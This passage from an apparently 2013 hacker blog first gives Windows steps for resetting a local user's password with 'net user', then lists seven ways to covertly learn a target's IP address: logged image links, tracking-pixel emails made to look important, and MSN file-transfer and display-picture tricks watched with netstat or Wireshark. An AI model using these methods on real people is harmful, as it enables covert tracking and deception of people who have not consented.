needs to be a computer adminstrator
to change the password without
knowing the current password.
Let’s get started!
1. Click on the Start button and
select “Run”
The Run window will appear. Type
into it the text, “cmd” (without the
quotes). Click OK
2. The CMD window nd will appear.
Type “net user”
A list of all the users that are on the
computer will appear.
3. Type the following: net user
<enter user name here without these
brackets> *
For example, if the user I want to
change passwords for is Mike, I would
type in:
net user Mike *
4. Press enter and you will be asked
to type in a new password.
Type in your new password. The
cursor will not move nore will it seem
like anything is happening but your
new password will be entered.
5. You will be asked to confirm your
new password. Enter it again and
press enter.
Congratulations, you have just
changed the password of your
Windows user without knowing the
current password!
Tuesday, 16 July 2013
How to know someone's ip adress
In many cases, it's desired to know the IP address of someone in the reconnaissance phase. The first question to ask is what information do I have about this person. In most cases it's possible that you have the email or IM of the target. First let's discuss the methods:
Method 1
if you have a web server hosted someplace where you can see its logs then it's very easy to send someone a URL of an image or any webpage hosted on your web server (http://123.123.123.123/veryfunnyimage.jpg) whenever this page is visited the web server keeps a log of who visited that page (IP address, time, browser, OS ... and lots of more info) where you can check later to collect IP addresses. if
Method 2
sometimes people get freaked out from addresses that have ip addresses in the URL so having your webserver with a domain name would really help the person you sent the URL to press on the link (www.mywebsite.com/veryfunnyimage.jpg)
Method 3
Some paranoid people don't open links to unknown sites. so here comes the cool trick. you can embed the image in a post of yours in a known site that allows HTML tags with image sources like < img src = (your image URL). in this case the URL you are going to send to the person is a link to a known website but the website contains another link to your web server. And whenever someone views this page on the known website, the "img src" link is invoked and voila!, you have a log entry on your webserver.
Method 4
Some Ultra paranoid people don't open links at all!! for these people I use my old trick. I send an email to the target that looks important to him (depending on the target actually and what's important to him). This email is in HTML format and contains a tag that links to an image on my webserver (probably a white image not to attract attention). Now upon merely opening the email, my webserver is invoked and a log entry is saved about the persons current IP address.
Note that this method only works if the email client allows images to be displayed (gmail disable that by default)
Method 5
A more faster approach is IM. If you have the IM of the target, then it's possible that you try to send him a file (not malicious, a picture or smthng). upon sending the file, a direct connection is established between you and the target. with a simple connection monitoring application (e.g.netstat on windows), you can know the Ip address.
Method 6
Some paranoid people don't accept files! so another trick in case of MSN is background sharing. the default for MSN is to accept backgrounds shared by others. Actually background sharing performs file sending if the background is not one of the default backgrounds. So the trick is to set your background for the IM to a cool pic from your computer and share it. if the default setting was not altered on your target's IM, then he will automatically accept it right away and a connection is opened. here comes again the connection monitoring app where you can identify the new connection and extract the IP add of the target.
Well those are one's that I used .. do you have any other methods ?? sometimes I only have the username on a forum or website. Any clues?
UPDATE:
Method 7
In MSN messenger, if u don't have the display picture of the person you're talking to, the messenger will try to download it by default. this cause the the MSN to open a direct connection. Using a sniffing tool like wireshark will allow you to know the IP of the remote person.So basically if you don't have his display picture and you opened the chat window you'll get your log entry. You can either convince the target to change his/her display picture or you can remove the your local directory that caches the display pictures for all contacts (located in application data folder for the msn) to force the messenger to redownload the picture.
Posted By (HaXoR)
Subscribe to:
Posts
(
Atom
)